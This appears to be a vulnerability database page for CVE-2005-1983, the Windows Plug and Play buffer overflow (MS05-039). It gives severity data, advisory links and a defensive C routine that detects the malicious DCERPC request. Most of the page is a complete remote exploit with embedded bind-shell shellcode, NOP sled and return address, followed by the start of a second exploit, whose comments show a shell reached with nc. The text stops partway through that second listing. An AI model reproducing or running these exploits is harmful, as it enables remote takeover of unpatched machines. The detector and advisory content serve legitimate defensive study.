CVE-2005-1983
CVSS 10.0
Published: 2005-08-10 00:00:00
Last revised: 2011-03-07 21:23:11

[Original] Stack-based buffer overflow in the Plug and Play (PnP) service for Microsoft Windows 2000 and Windows XP Service Pack 1 allows remote attackers to execute arbitrary code via a crafted packet, and local users to gain privileges via a malicious application, as exploited by the Zotob (aka Mytob) worm.


[CNNVD] Microsoft Windows buffer overflow vulnerability (CNNVD-200508-080)

        The Microsoft Windows Plug and Play (PnP) feature lets the operating system detect newly installed hardware.
        The Plug and Play service contains a buffer overflow; an attacker who exploits it successfully can take complete control of the affected system. The flaw lies in the way the PnP service handles a malformed message that carries more data than the service expects. On Windows 2000 an anonymous user can exploit it by sending a crafted message; on Windows XP Service Pack 1 only an authenticated user can send the malicious message; on Windows XP Service Pack 2 and Windows Server 2003 the attacker must log on locally and run a specially crafted application. A network worm that spreads through this vulnerability is already in circulation.
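The crafted message the description refers to is a DCERPC request to the Plug and Play RPC interface, sent through an SMB named pipe; the exploit listings further down this page carry the exact bytes. The inspector below is an added example written for this page, not code from those exploits, from Microsoft, or from any IDS product. It takes one DCERPC PDU (the caller is assumed to have already stripped the NetBIOS/SMB/Trans framing), reports a bind whose first context item is the PNP interface 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0, and reports an opnum 54 (PNP_QueryResConfList) request whose stub exceeds a threshold. All function names are mine, the 1024-byte threshold is an assumption chosen for illustration rather than a documented buffer size, and the sample PDUs are constructed from the byte strings in the listings below (the bind from SMB_PNPEndpoint, the request header from RPC_call) plus a srvsvc bind as the negative case.

```c
/* Added example for this page (not code from the exploits listed here): inspects
 * one DCERPC PDU for the MS05-039 pattern.  Assumes SMB/Trans framing is already
 * removed.  PNP_STUB_THRESHOLD is a heuristic, not a documented buffer size. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define DCERPC_PTYPE_REQUEST       0x00
#define DCERPC_PTYPE_BIND          0x0B
#define DCERPC_HDR_LEN             16
#define DCERPC_REQ_STUB_OFF        24   /* hdr(16) + alloc_hint(4) + ctx_id(2) + opnum(2) */
#define DCERPC_BIND_UUID_OFF       32   /* hdr(16) + max_xmit/max_recv/assoc(8) + n_ctx+pad(4) + ctx_id+n_trans+pad(4) */
#define PNP_OPNUM_QUERYRESCONFLIST 54   /* 0x36 */
#define PNP_STUB_THRESHOLD         1024 /* heuristic (assumption) */

/* 8d9f4e40-a03d-11ce-8f69-08003e30051b in wire order (first three fields little-endian) */
static const uint8_t PNP_IFACE_UUID[16] = {
    0x40,0x4E,0x9F,0x8D,0x3D,0xA0,0xCE,0x11,0x8F,0x69,0x08,0x00,0x3E,0x30,0x05,0x1B };
/* srvsvc 4b324fc8-1670-01d3-1278-5a47bf6ee188, used only for the negative sample */
static const uint8_t SRVSVC_IFACE_UUID[16] = {
    0xC8,0x4F,0x32,0x4B,0x70,0x16,0xD3,0x01,0x12,0x78,0x5A,0x47,0xBF,0x6E,0xE1,0x88 };

static uint16_t rd16le(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* rpc_vers 5.0, expected packet type, and a frag_length that fits in the buffer */
static int hdr_ok(const uint8_t *pdu, size_t len, uint8_t ptype)
{
    return len >= DCERPC_HDR_LEN && pdu[0] == 5 && pdu[1] == 0 &&
           pdu[2] == ptype && (size_t)rd16le(pdu + 8) <= len;
}

/* 1 if the PDU is a bind whose first context item names the PNP interface v1 */
int dcerpc_bind_targets_pnp(const uint8_t *pdu, size_t len)
{
    if (!hdr_ok(pdu, len, DCERPC_PTYPE_BIND) || len < DCERPC_BIND_UUID_OFF + 20) return 0;
    if (pdu[24] == 0) return 0;                                    /* n_context_elem */
    if (memcmp(pdu + DCERPC_BIND_UUID_OFF, PNP_IFACE_UUID, 16) != 0) return 0;
    return rd16le(pdu + DCERPC_BIND_UUID_OFF + 16) == 1;           /* if_version major */
}

/* stub length if the PDU is an opnum-54 request with an oversized stub, else 0 */
size_t dcerpc_request_is_ms05_039(const uint8_t *pdu, size_t len)
{
    uint16_t frag_len;
    size_t stub;
    if (!hdr_ok(pdu, len, DCERPC_PTYPE_REQUEST)) return 0;
    frag_len = rd16le(pdu + 8);
    if (frag_len < DCERPC_REQ_STUB_OFF) return 0;
    if (rd16le(pdu + 22) != PNP_OPNUM_QUERYRESCONFLIST) return 0; /* opnum */
    stub = frag_len - DCERPC_REQ_STUB_OFF;
    return stub > PNP_STUB_THRESHOLD ? stub : 0;
}

/* ---- constructed samples, copied from the byte strings in the listings below ---- */
/* the 72-byte DCERPC bind inside SMB_PNPEndpoint */
static const uint8_t SAMPLE_BIND_PNP[72] = {
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
    0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
    0x40,0x4E,0x9F,0x8D,0x3D,0xA0,0xCE,0x11,0x8F,0x69,0x08,0x00,0x3E,0x30,0x05,0x1B,
    0x01,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00 };
/* the 24-byte DCERPC request header inside RPC_call: frag_length 0x083C, opnum 0x36 */
static const uint8_t SAMPLE_REQ_HDR[24] = {
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x3C,0x08,0x00,0x00,0x01,0x00,0x00,0x00,
    0x24,0x08,0x00,0x00,0x00,0x00,0x36,0x00 };
#define SAMPLE_REQ_LEN 2108

/* request header followed by a NOP-filled stub, as the exploits send it */
static void fill_request(uint8_t *buf, size_t len)
{
    memcpy(buf, SAMPLE_REQ_HDR, sizeof SAMPLE_REQ_HDR);
    memset(buf + sizeof SAMPLE_REQ_HDR, 0x90, len - sizeof SAMPLE_REQ_HDR);
}

/* full 2108-byte request: 2084 bytes of stub, well over the threshold */
size_t demo_pnp_request(void)
{
    uint8_t req[SAMPLE_REQ_LEN];
    fill_request(req, sizeof req);
    return dcerpc_request_is_ms05_039(req, sizeof req);
}

/* same header but only 100 bytes received: frag_length exceeds the buffer, so not inspected */
size_t demo_truncated_request(void)
{
    uint8_t req[100];
    fill_request(req, sizeof req);
    return dcerpc_request_is_ms05_039(req, sizeof req);
}

int demo_bind_pnp(void)
{
    return dcerpc_bind_targets_pnp(SAMPLE_BIND_PNP, sizeof SAMPLE_BIND_PNP);
}

/* the same bind with the interface swapped to srvsvc must not match */
int demo_bind_srvsvc(void)
{
    uint8_t pdu[sizeof SAMPLE_BIND_PNP];
    memcpy(pdu, SAMPLE_BIND_PNP, sizeof pdu);
    memcpy(pdu + DCERPC_BIND_UUID_OFF, SRVSVC_IFACE_UUID, 16);
    return dcerpc_bind_targets_pnp(pdu, sizeof pdu);
}

int main(void)
{
    printf("bind -> PNP interface    : %d\n", demo_bind_pnp());
    printf("bind -> srvsvc interface : %d\n", demo_bind_srvsvc());
    printf("opnum 54 oversized stub  : %zu bytes\n", demo_pnp_request());
    printf("truncated PDU            : %zu (not inspected)\n", demo_truncated_request());
    return 0;
}
```

Keying on opnum 54 plus stub size trades precision for simplicity: it catches both exploits on this page (each sends a 2084-byte stub), while a bind to the PNP interface by itself is legitimate traffic and is reported only as context. A PDU whose frag_length exceeds the bytes actually received is deliberately ignored rather than partially inspected, so a fragmented request needs reassembly before this check is useful.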
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [the system can be taken down completely]
Access complexity: LOW [no special access conditions needed to exploit]
Access vector: [--]
Authentication: NONE [no authentication needed to exploit]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_2000    Microsoft Windows 2000
cpe:/o:microsoft:windows_xp::sp1:tablet_pc    Microsoft Windows XP SP1 Tablet PC

- OVAL (technical details for detection)

oval:org.mitre.oval:def:783    Windows Server 2003 Plug and Play Buffer Overflow Vulnerability
oval:org.mitre.oval:def:497    Windows XP,SP2 Plug and Play Buffer Overflow Vulnerability
oval:org.mitre.oval:def:474    Windows 2000 Plug and Play Buffer Overflow Vulnerability
oval:org.mitre.oval:def:267    Windows XP Plug and Play Buffer Overflow Vulnerability
oval:org.mitre.oval:def:160    Windows Server 2003 Plug and Play Buffer Overflow Vulnerability
oval:org.mitre.oval:def:100073    Windows XP (64-bit) PnP Buffer Overflow
*The OVAL definitions describe in detail how to detect this vulnerability; see the linked definitions for further technical detail.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1983
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1983
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-080
(official data source) CNNVD

- Other links and resources

http://www.us-cert.gov/cas/techalerts/TA05-221A.html
(PATCH)  CERT  TA05-221A
http://www.kb.cert.org/vuls/id/998653
(UNKNOWN)  CERT-VN  VU#998653
http://www.microsoft.com/technet/Security/bulletin/ms05-039.mspx
(PATCH)  MS  MS05-039
http://www.vupen.com/english/advisories/2005/1354
(UNKNOWN)  VUPEN  ADV-2005-1354
http://xforce.iss.net/xforce/xfdb/21602
(UNKNOWN)  XF  win-plugandplay-bo(21602)
http://xforce.iss.net/xforce/alerts/id/202
(UNKNOWN)  ISS  20050809 Windows Plug and Play Remote Compromise
http://www.securityfocus.com/bid/14513
(UNKNOWN)  BID  14513
http://www.securiteam.com/windowsntfocus/5YP0E00GKW.html
(UNKNOWN)  MISC  http://www.securiteam.com/windowsntfocus/5YP0E00GKW.html
http://www.osvdb.org/18605
(UNKNOWN)  OSVDB  18605
http://www.hsc.fr/ressources/presentations/null_sessions/
(UNKNOWN)  MISC  http://www.hsc.fr/ressources/presentations/null_sessions/
http://www.frsirt.com/english/alerts/20050814.ZotobA.php
(UNKNOWN)  MISC  http://www.frsirt.com/english/alerts/20050814.ZotobA.php
http://www.ciac.org/ciac/bulletins/p-266.shtml
(UNKNOWN)  CIAC  P-266
http://securitytracker.com/id?1014640
(UNKNOWN)  SECTRACK  1014640
http://secunia.com/advisories/16372
(UNKNOWN)  SECUNIA  16372
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0384.html
(UNKNOWN)  FULLDISC  20050811 Windows 2000 universal exploit for MS05-039

- Vulnerability information

Microsoft Windows buffer overflow vulnerability
Severity: Critical    Type: Buffer overflow
Published: 2005-08-10 00:00:00    Updated: 2005-10-20 00:00:00
Attack vector: Remote / Local

- Advisory and patch

        The vendor has released an update that fixes this issue; patch download link:
        http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx?pf=true
        The bulletin's knowledge base article is 899588; on a patched host KB899588 appears in the installed hotfix list.

- Exploit entry (EDB-ID 1146)

MS Windows Plug-and-Play Service Remote Overflow (MS05-039) (EDBID:1146)
Platform: windows    Type: remote
Date: 2005-08-11    Verified
Port: 139    Author: sl0ppy
/*
Windows 2000 universal exploit for MS05-039
-\x6d\x35\x6c\x30\x6e\x6e\x79-
*/

#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <winnetwk.h>
#include <winsock.h>
#include <Rpc.h>
#include <wchar.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")

BYTE Data1[0x68] =
{0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,
 0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00,
 0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00,
 0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00,
 0xFF,0xFF,0x00,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
 0x00,0x00,0x00,0x00,0xEE,0xEE,0xEE,0xEE,0x00,0x00,0x00,0x00,
 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x21,0x00,0x00,0x00,
 0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
struct DataStruct1
{
       BYTE SomeString[0x30];
       DWORD RESDataType;
       DWORD LFD;
       DWORD SDM1;
       DWORD SDO;
       DWORD SDL;
       DWORD SDM2;
       BYTE  SDA[0x07D0];
       DWORD LRD;
       DWORD MB;
       DWORD DM;
};
struct RPCBIND
{
       BYTE VerMaj;
       BYTE VerMin;
       BYTE PacketType;
       BYTE PacketFlags;
       DWORD DataRep;
       WORD FragLength;
       WORD AuthLength;
       DWORD CallID;
       WORD MaxXmitFrag;
       WORD MaxRecvFrag;
       DWORD AssocGroup;
       BYTE NumCtxItems;
       WORD ContextID;
       WORD NumTransItems;
       GUID InterfaceUUID;
       WORD InterfaceVerMaj;
       WORD InterfaceVerMin;
       GUID TransferSyntax;
       DWORD SyntaxVer;
};
//from metasploit, before you were born
BYTE BindShell[374]={"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
"\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
"\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9"
"\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d"
"\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51"
"\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54"
"\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff"
"\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a"
"\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55"
"\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c"
"\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10"
"\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c"
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
"\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff"
"\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3"
"\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55"
"\x04\x31\xdb\x53\xff\xd0"};
BYTE PRPC[0x48] =
{0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
 0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
 0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
struct RPCFUNC
{
       BYTE VerMaj;
       BYTE VerMin;
       BYTE PacketType;
       BYTE PacketFlags;
       DWORD DataRep;
       WORD FragLength;
       WORD AuthLength;
       DWORD CallID;
       DWORD AllocHint;
       WORD ContextID;
       WORD Opnum;
};
BYTE POP[0x27] =
{0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xAC,0x10,0x00,0x00,0x01,0x00,0x00,0x00,
 0x94,0x10,0x00,0x00,0x00,0x00,0x09,0x00,0x05,0x08,0x00,0x00,0x00,0x00,0x00,0x00,
 0x05,0x08,0x00,0x00,0x41,0x00,0x41};

/* Send a DCERPC bind for the requested interface UUID/version over the
 * already opened pipe. PRPC is the bind header template; only the
 * interface UUID and version fields are patched in before sending. */
int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
       BYTE rbuf[0x1000];
       DWORD dw;
       struct RPCBIND RPCBind;

       memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
       UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);
       RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);   /* "1.0" -> major 1 */
       RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);   /*        -> minor 0 */
       TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL);
       return 0;
}

/* Build and send the malformed PNP_QueryResConfList (opnum 54) request.
 * Data1 is the stub template (the device instance ID "ROOT\SYSTEM\0000" plus
 * the length fields); SDA is filled with NOPs, the four bytes at SDA[76..79]
 * form the Windows 2000 specific address 0x75021e3e that takes over control
 * flow, and the Metasploit bind shell (listens on port 8721) follows at SDA[94]. */
int Attack(HANDLE PipeHandle)
{
       struct RPCFUNC RPCOP;
       BYTE *LargeBuffer;
       BYTE rbuf[0x100];
       DWORD dw;
       struct DataStruct1 EvilRPC;

       /* Data1 only covers the first 0x68 bytes of the stub; zero the rest
        * instead of reading past the end of the template */
       memset(&EvilRPC,0,sizeof(EvilRPC));
       memcpy(&EvilRPC,Data1,sizeof(Data1));
       EvilRPC.SDL=0x07C0;
       memset(EvilRPC.SDA,0x90,0x07D0);              /* NOP sled */
       EvilRPC.SDA[76]=0x3e;                         /* 0x75021e3e, little-endian */
       EvilRPC.SDA[77]=0x1e;
       EvilRPC.SDA[78]=0x02;
       EvilRPC.SDA[79]=0x75;
       memcpy(EvilRPC.SDA+94,BindShell,374);         /* shellcode after the sled */
       EvilRPC.MB=0x00000004;
       EvilRPC.DM=0x00000000;
       EvilRPC.LFD=0x000007E0;
       EvilRPC.LRD=0x000007E0;
       memcpy(&RPCOP,&POP,sizeof(RPCOP));            /* request header template */
       RPCOP.Opnum = 54;                             /* PNP_QueryResConfList */
       RPCOP.FragLength=sizeof(RPCOP)+sizeof(EvilRPC);
       RPCOP.AllocHint=sizeof(EvilRPC);
       LargeBuffer=malloc(sizeof(RPCOP)+sizeof(EvilRPC));
       if (LargeBuffer == NULL)
               return 1;
       memset(LargeBuffer,0x00,sizeof(RPCOP)+sizeof(EvilRPC));
       memcpy(LargeBuffer,&RPCOP,sizeof(RPCOP));
       memcpy(LargeBuffer+sizeof(RPCOP),&EvilRPC,sizeof(EvilRPC));
       printf("Sending payload...\nThis has to time out... ctrl+c after 5 secs\ncheck for shell on port 8721\n");
       TransactNamedPipe(PipeHandle, LargeBuffer, sizeof(RPCOP)+sizeof(EvilRPC), rbuf, sizeof(rbuf), &dw, NULL);
       free(LargeBuffer);
       return 0;
}


int main(int argc, char* argv[])
{
       char *server;
       NETRESOURCE nr;
       char unc[MAX_PATH];
       char szPipe[MAX_PATH];
       HANDLE hFile;

       if (argc < 2)
       {
               printf("Usage: %s <host>\n", argv[0]);
               return 1;
       }
       server=argv[1];

       /* Null session: an empty user name and password are enough on Windows 2000 */
       _snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
       unc[sizeof(unc)-1] = 0;
       nr.dwType       = RESOURCETYPE_ANY;
       nr.lpLocalName  = NULL;
       nr.lpRemoteName = unc;
       nr.lpProvider   = NULL;
       WNetAddConnection2(&nr, "", "", 0);

       /* \pipe\browser accepts null-session clients on Windows 2000; the PNP RPC
        * interface is registered in the same process, so it can be bound through
        * this pipe */
       _snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser",server);
       szPipe[sizeof(szPipe)-1] = 0;
       hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
       if (hFile == INVALID_HANDLE_VALUE)
       {
               printf("CreateFile(%s) failed: %lu\n", szPipe, GetLastError());
               return 1;
       }

       /* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0 is the Plug and Play (umpnpmgr) RPC interface */
       BindRpcInterface(hFile,"8d9f4e40-a03d-11ce-8f69-08003e30051b","1.0");

       /* Send the malformed RPC request */
       Attack(hFile);
       CloseHandle(hFile);
       return 0;
}

// milw0rm.com [2005-08-11]
		

- Exploit entry (EDB-ID 1179)

MS Windows Plug-and-Play Service Remote Universal Exploit (spanish fix) (EDBID:1179)
Platform: windows    Type: remote
Date: 2005-08-25    Verified
Port: 445    Author: RoMaNSoFt
/*
 * HOD-ms05039-pnp-expl-spanish.c [25.Aug.2005]
 * Very slightly modified version by Roman Medina <roman@rs-labs.com>
 * Tested on Win2k SP4 Spanish.
 * Original credits & comments follow.
 */


/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2
 *
 * Copyright (c) 2005 houseofdabus.
 *
 * (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
 * Universal Exploit + no crash shellcode
 *
 *
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 *
 * ---------------------------------------------------------------------
 * Description:
 *    A remote code execution and local elevation of privilege
 *    vulnerability exists in Plug and Play that could allow an
 *    attacker who successfully exploited this vulnerability to take
 *    complete control of the affected system.
 *
 *    This is a remote code execution and local privilege elevation
 *    vulnerability. On Windows 2000, an anonymous attacker could
 *    remotely try to exploit this vulnerability.
 *
 *    On Windows XP Service Pack 1, only an authenticated user could
 *    remotely try to exploit this vulnerability.
 *    On Window XP Service Pack 2 and Windows Server 2003, only an
 *    administrator can remotely access the affected component.
 *    Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
 *    this is strictly a local privilege elevation vulnerability.
 *    An anonymous user cannot remotely attempt to exploit this
 *    vulnerability on Windows XP Service Pack 2 and Windows
 *    Server 2003.
 *
 * ---------------------------------------------------------------------
 * Solution:
 *    http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
 *
 * ---------------------------------------------------------------------
 * Systems Affected:
 *    - Windows Server 2003, SP1
 *    - Windows XP SP1, SP2
 *    - Windows 2000 SP4
 *
 * ---------------------------------------------------------------------
 * Tested on:
 *    - Windows 2000 SP4
 *
 * ---------------------------------------------------------------------
 * Compile:
 *
 * Win32/VC++  : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 * Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 * Linux       : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 *
 * ---------------------------------------------------------------------
 * Example:
 *
 * C:\>HOD-ms05039-pnp-expl 192.168.0.1 7777
 *
 * [*] connecting to 192.168.0.22:445...ok
 * [*] null session...ok
 * [*] bind pipe...ok
 * [*] sending crafted packet...ok
 * [*] check your shell on 192.168.0.1:7777
 * Ctrl+C
 *
 * C:\>nc 192.168.0.1 7777
 *
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\WINNT\system32>
 *
 * ---------------------------------------------------------------------
 *
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 */

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#endif


unsigned char SMB_Negotiate[] =
	"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
	"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
	"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
	"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
	"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
	"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
	"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
	"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";


unsigned char SMB_SessionSetupAndX[] =
	"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
	"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
	"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
	"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
	"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
	"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
	"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
	"\x2E\x00\x30\x00\x00\x00\x00\x00";


unsigned char SMB_SessionSetupAndX2[] =
	"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
	"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
	"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
	"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
	"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
	"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
	"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
	"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
	"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
	"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
	"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
	"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
	"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";


unsigned char SMB_TreeConnectAndX[] =
	"\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
	"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";



unsigned char SMB_TreeConnectAndX_[] =
	"\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";


/* browser */
unsigned char SMB_PipeRequest_browser[] =
	"\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
	"\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00"
	"\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
	"\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00"
	"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";


unsigned char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
	"\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
